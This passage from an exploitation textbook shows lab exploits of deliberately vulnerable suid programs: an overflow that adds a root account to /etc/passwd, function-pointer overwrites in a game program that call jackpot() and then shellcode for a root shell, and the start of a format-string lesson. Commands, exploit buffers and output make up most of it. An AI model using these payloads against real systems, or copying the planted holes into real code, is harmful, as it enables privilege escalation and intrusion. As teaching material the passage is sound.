myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values in this line just need to be modified slightly so that the portion before /etc/passwd is exactly 104 bytes long:

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 . ":/root:/tmp"' | wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ `perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp"'` | wc -c
104
reader@hacking:~/booksrc $

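If /etc/passwd is added to the end of that final string (shown in bold), the string above will be appended to the end of the /etc/passwd file. And since this line defines an account with root privileges and a password we set, it won't be difficult to access this account and obtain root access, as the following output shows.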

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp/etc/passwd"')
[DEBUG] buffer   @ 0x804a008: 'myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd'
[DEBUG] datafile @ 0x804a070: '/etc/passwd'
[DEBUG] file descriptor is 3
Note has been saved.
*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]
/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]
./notetaker[0x8048916]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]
./notetaker[0x8048511]
======= Memory map: ========
08048000-08049000 r-xp 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
08049000-0804a000 rw-p 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
0804a000-0806b000 rw-p 0804a000 00:00 0          [heap]
b7d00000-b7d21000 rw-p b7d00000 00:00 0
b7d21000-b7e00000 ---p b7d21000 00:00 0
b7e83000-b7e8e000 r-xp 00000000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e99000-b7e9a000 rw-p b7e99000 00:00 0
b7e9a000-b7fd5000 r-xp 00000000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd5000-b7fd6000 r--p 0013b000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0
b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0
b7fe7000-b8000000 r-xp 00000000 07:00 15421      /rofs/lib/ld-2.5.so
b8000000-b8002000 rw-p 00019000 07:00 15421      /rofs/lib/ld-2.5.so
bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
Aborted
reader@hacking:~/booksrc $ tail /etc/passwd
avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:106:113::/home/cupsys:/bin/false
haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:109:118:Gnome Display Manager:/var/lib/gdm:/bin/false
matrix:x:500:500:User Acct:/home/matrix:/bin/bash
jose:x:501:501:Jose Ronnick:/home/jose:/bin/bash
reader:x:999:999:Hacker,,,:/home/reader:/bin/bash
?
myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA:/
root:/tmp/etc/passwd
reader@hacking:~/booksrc $ su myroot
Password:
root@hacking:/home/reader/booksrc# whoami
root
root@hacking:/home/reader/booksrc#
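The padding length of 68 that was found earlier in this section with wc and gdb is plain arithmetic: the fixed parts of the entry are 25 bytes (myroot:XXq2wKiyI43A2:0:0:) and 11 bytes (:/root:/tmp), so 104 - 36 = 68 filler characters are needed. A minimal sketch of that calculation follows; padding_needed is a hypothetical name used only here.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Number of filler bytes needed between prefix and suffix so that
 * prefix + filler + suffix is exactly target_len bytes long. */
size_t padding_needed(size_t target_len, const char *prefix,
                      const char *suffix)
{
    size_t fixed;

    assert(prefix != NULL && suffix != NULL);
    fixed = strlen(prefix) + strlen(suffix);
    assert(fixed <= target_len);   /* otherwise no padding can help */
    return target_len - fixed;
}
```

Calling padding_needed(104, "myroot:XXq2wKiyI43A2:0:0:", ":/root:/tmp") gives 68, the repeat count used for the A characters in the final command.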

Overflowing Function Pointers

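If you have played with the game_of_chance.c program enough, you will realize that, as in a casino, most of the games are statistically weighted in favor of the house. This makes winning credits difficult, no matter how lucky you might be. Perhaps there's a way to even the odds a bit. This program uses a function pointer to remember the last game played. This pointer is stored in the user structure, which is declared as a global variable. This means all the memory for the user structure is allocated in the bss segment.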

From `game_of_chance.c`

// Custom user struct to store information about users
struct user {
  int uid;
  int credits;
  int highscore;
  char name[100];
  int (*current_game) ();
};

...

// Global variables 
struct user player;      // Player struct

The name buffer in the user structure is a likely place for an overflow. This buffer is set by the input_name() function, shown below:

// This function is used to input the player name, since 
// scanf("%s", &whatever) will stop input at the first space.
void input_name() {
   char *name_ptr, input_char='\n';
   while(input_char == '\n')     // Flush any leftover 
      scanf("%c", &input_char);  // newline chars.

   name_ptr = (char *) &(player.name); // name_ptr = player name's address
   while(input_char != '\n') {  // Loop until newline.
      *name_ptr = input_char;   // Put the input char into name field.
      scanf("%c", &input_char); // Get the next char.
      name_ptr++;               // Increment the name pointer.
   }
   *name_ptr = 0;  // Terminate the string. 
}

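This function only stops reading input at a newline character. Nothing limits it to the length of the destination name buffer, which means an overflow is possible. To take advantage of the overflow, we need to make the program call the function pointer after it has been overwritten. This happens in the play_the_game() function, which is called when any game is selected from the menu. The following code snippet is part of the menu selection code, used for picking and playing a game.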

	if((choice < 1) || (choice > 7))
	   printf("\n[!!] The number %d is an invalid selection.\n\n", choice);
	else if (choice < 4) {  // Otherwise, choice was a game of some sort.
	      if(choice != last_game) { // If the function ptr isn't set,
	         if(choice == 1)        // then point it at the selected game 
	            player.current_game = pick_a_number;
	         else if(choice == 2)
	            player.current_game = dealer_no_match;
	         else
	            player.current_game = find_the_ace;
	         last_game = choice;   // and set last_game.
	      }
	      play_the_game();   // Play the game.
	   }

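If last_game isn't the same as the current choice, the current_game function pointer is changed to the appropriate game. This means that in order to get the program to call the function pointer without overwriting it, a game must be played first to set the last_game variable.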

reader@hacking:~/booksrc $ ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] ->  1

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: 5
The winning number is 17
Sorry, you didn't win.

You now have 60 credits
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[1]+  Stopped                 ./game_of_chance
reader@hacking:~/booksrc $

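You can temporarily suspend the current process by pressing CTRL-Z. At this point, the last_game variable has been set to 1, so the next time 1 is selected, the function pointer will simply be called without being changed. Back at the shell, we can work out an appropriate overflow buffer, which can be copied and pasted in as a name later. Recompiling the source with debugging symbols and using GDB to run the program with a breakpoint on main() allows us to explore the memory. As the output below shows, the name buffer is located 100 bytes before the current_game pointer within the user structure.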

reader@hacking:~/booksrc $ gcc -g game_of_chance.c
reader@hacking:~/booksrc $ gdb -q ./a.out 
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at game_of_chance.c:41
41         srand(time(0)); // Seed the randomizer with the current time.
(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>, 
current_game = 0}
(gdb) x/x &player.name
0x804b66c <player+12>:  0x00000000
(gdb) x/x &player.current_game
0x804b6d0 <player+112>: 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $
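The 100-byte distance that GDB reports can also be derived from the structure definition with offsetof. The sketch below copies the struct user layout from game_of_chance.c and computes the gap; name_to_pointer_gap is a hypothetical helper, the function pointer is declared with a (void) parameter list only to keep newer compilers quiet, and the result assumes 4-byte int values as on the book's x86 system.

```c
#include <assert.h>
#include <stddef.h>

/* Same member order as the user structure in game_of_chance.c. */
struct user {
    int uid;
    int credits;
    int highscore;
    char name[100];
    int (*current_game)(void);
};

/* Distance in bytes from the start of name to current_game. */
size_t name_to_pointer_gap(void)
{
    /* name is expected to follow the three ints with no padding. */
    assert(offsetof(struct user, name) == 3 * sizeof(int));
    return offsetof(struct user, current_game)
           - offsetof(struct user, name);
}
```

With 4-byte integers, name starts at offset 12 and current_game at offset 112, matching the <player+12> and <player+112> labels in the GDB output.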

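Using this information, we can generate a buffer to overflow the name variable with. This can be copied and pasted into the interactive Game of Chance program when it is resumed. To return to the suspended process, just type fg, which is short for foreground.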

reader@hacking:~/booksrc $ perl -e 'print "A"x100 . "BBBB" . "\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg
./game_of_chance
5

Change user name

Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] ->  1

[DEBUG] current_game pointer @ 0x42424242
Segmentation fault 
reader@hacking:~/booksrc $

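Select menu option 5 to change the username, and paste in the overflow buffer. This overwrites the function pointer with 0x42424242. When menu option 1 is selected again, the program crashes when it tries to call the function pointer. This is proof that execution can be controlled; now all that's needed is a valid address to insert in place of BBBB.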

The nm command lists the symbols in object files. This can be used to find the addresses of various functions in a program.

reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
         w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
         w __gmon_start__
08049669 T __i686.get_pc_thunk.bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
0804b630 A _edata
0804b6d4 A _end
080496a0 T _fini
080496c0 R _fp_hw
08048484 T _init
080485c0 T _start
080485e4 t call_gmon_start
         U close@@GLIBC_2.0
0804b640 b completed.1
0804b624 W data_start
080490d1 T dealer_no_match
080486fc T dump
080486d1 T ec_malloc
         U exit@@GLIBC_2.0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
         U getuid@@GLIBC_2.0
08048d97 T input_name
08048d70 T jackpot
08048803 T main
         U malloc@@GLIBC_2.0
         U open@@GLIBC_2.0
0804b62c d p.0
         U perror@@GLIBC_2.0
08048fde T pick_a_number
08048f23 T play_the_game
0804b660 B player
08048df8 T print_cards
         U printf@@GLIBC_2.0
         U rand@@GLIBC_2.0
         U read@@GLIBC_2.0
08048aaf T register_new_player
         U scanf@@GLIBC_2.0
08048c72 T show_highscore
         U srand@@GLIBC_2.0
         U strcpy@@GLIBC_2.0
         U strncat@@GLIBC_2.0
08048e91 T take_wager
         U time@@GLIBC_2.0
08048b72 T update_player_data
         U write@@GLIBC_2.0 
reader@hacking:~/booksrc $

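The jackpot() function is a wonderful target for this exploit. Even though the games give terrible odds, if the current_game function pointer is carefully overwritten with the address of the jackpot() function, you won't even have to play the game to win credits. Instead, the jackpot() function will be called directly, doling out the reward of 100 credits and tipping the scales in the player's favor.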

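This program takes its input from standard input. The menu selections can be scripted in a single buffer that is piped to the program's standard input. These selections will be made as if they had been typed. The following example selects menu item 1, tries to guess the number 7, selects n when asked to play again, and finally selects menu item 7 to quit.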

reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->  
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win.

You now have 50 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->  
Thanks for playing! Bye. 
reader@hacking:~/booksrc $

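The same technique can be used to script everything needed for the exploit. The following line plays the Pick a Number game once, then changes the username to 100 A's followed by the address of the jackpot() function. This overflows the current_game function pointer, so when the Pick a Number game is played again, the jackpot() function is called directly.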

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\x8d\x04\x08\n" . "1\nn\n" . "7\n"'
1
5
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAp?
1
n
7
reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\x8d\x04\x08\n" . "1\nn\n" . "7\n"' | ./game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->  
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 15
Sorry, you didn't win.

You now have 40 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 40 credits] ->  
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 40 credits] ->

[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 140 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->  
Thanks for playing! Bye. 
reader@hacking:~/booksrc $

Now that this method is confirmed to work, it can be extended to win any number of credits.

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\
x8d\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nJon Erickson\n7\n"' | ./
game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win.

You now have 130 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 230 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 330 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 430 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 530 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 630 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 730 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 830 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 930 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 1030 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 1130 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

You now have 1230 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 1230 credits] ->
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 1230 credits] ->
Thanks for playing! Bye.
reader@hacking:~/booksrc $

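As you may have already noticed, this program also runs suid root. This means shellcode can be used to do a lot more than win free credits. As with the stack-based overflow, shellcode can be stashed in an environment variable. After a suitable exploit buffer is built, the buffer is piped to the standard input of game_of_chance. Notice the dash argument following the exploit buffer in the cat command. This tells the cat program to send standard input after the exploit buffer, returning control of the input. Even though the root shell doesn't display its prompt, it is still accessible and still runs with escalated privileges.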

reader@hacking:~/booksrc $ export SHELLCODE=$(cat ./shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./game_of_chance
SHELLCODE will be at 0xbffff9e0
reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n5\n" . "A"x100 . "\xe0\
xf9\xff\xbf\n" . "1\n"' > exploit_buffer
reader@hacking:~/booksrc $ cat exploit_buffer - | ./game_of_chance 
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] ->
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 2
Sorry, you didn't win.

You now have 60 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->  
Change user name
Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 60 credits] ->  
[DEBUG] current_game pointer @ 0xbffff9e0

whoami
root
id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(
plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(re
ader)

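Format Strings

A format string exploit is another technique that can be used to gain control of a privileged program. Like buffer overflow exploits, format string exploits depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format string vulnerabilities and eliminate them. Although format string vulnerabilities aren't very common anymore, the following techniques can also be used in other situations.

Format Parameters

You should be fairly familiar with basic format strings by now. They have been used extensively with functions like printf() in previous programs. A function that uses format strings, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three more arguments to the function (in addition to the format string argument).

Recall the various format parameters explained in the previous chapter.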

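Parameter	Input Type	Output Type
`%d`	Value	Decimal
`%u`	Value	Unsigned decimal
`%x`	Value	Hexadecimal
`%s`	Pointer	String
`%n`	Pointer	Number of bytes written so far

The previous chapter demonstrated the use of the more common format parameters, but neglected the less common %n format parameter. The fmt_uncommon.c code demonstrates its use.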

fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   exit(0); 
}

This program uses two %n format parameters in its printf() statement. The following is the output of the program's compilation and execution.

reader@hacking:~/booksrc $ gcc fmt_uncommon.c 
reader@hacking:~/booksrc $ ./a.out 
The number of bytes written up to this point X is being stored in count_one, and the
 number of 
bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bffff7f4.  B is 7.
reader@hacking:~/booksrc $

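The %n format parameter is unique in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes the number of bytes the function has written so far to the address in the corresponding function argument. In fmt_uncommon, this is done in two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then output, revealing that 46 bytes are written before the first %n and 113 before the second.

The stack example at the end is a convenient segue into an explanation of the stack's role with format strings: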

	printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

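When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order. First the value of B, then the address of A, then the value of A, and finally the address of the format string.

The stack will look like the diagram here.

The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.

Figure 0x300-3.

But what if only two arguments are pushed to the stack with a format string that uses three format parameters? Try removing the last argument from the printf() line for the stack example so it matches the line shown below.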

	printf("A is %d and is at %08x.  B is %x.\n", A, &A);

This can be done in an editor or with a little bit of sed magic.

reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c
reader@hacking:~/booksrc $ diff fmt_uncommon.c fmt_uncommon2.c 
14c14
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>       printf("A is %d and is at %08x.  B is %x.\n", A, &A);
reader@hacking:~/booksrc $ gcc fmt_uncommon2.c 
reader@hacking:~/booksrc $ ./a.out
The number of bytes written up to this point X is being stored in count_one, and the
 number of 
bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bffffc24.  B is b7fd6ff4.
reader@hacking:~/booksrc $

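The result is b7fd6ff4. What is b7fd6ff4? It turns out that since no value was pushed to the stack, the format function simply pulled data from where the third argument should have been (by adding to the current frame pointer). This means 0xb7fd6ff4 is the first value found below the stack frame for the format function.

This is an interesting detail that should be remembered. It would be a lot more useful if there were a way to control either the number of arguments passed to a format function or the number it expects. Luckily, there is a fairly common programming mistake that allows for the latter.

The Format String Vulnerability

Sometimes programmers use printf(string) instead of printf("%s", string) to print strings. Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Examples of both methods are shown in fmt_vuln.c.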

fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, 
test_val);

   exit(0);
}

The following output shows the compilation and execution of fmt_vuln.c.

reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln.c 
reader@hacking:~/booksrc $ sudo chown root:root ./fmt_vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./fmt_vuln
reader@hacking:~/booksrc $ ./fmt_vuln testing
The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

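Both methods seem to work with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.

reader@hacking:~/booksrc $ ./fmt_vuln testing%x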
The right way to print user-controlled input:
testing%x
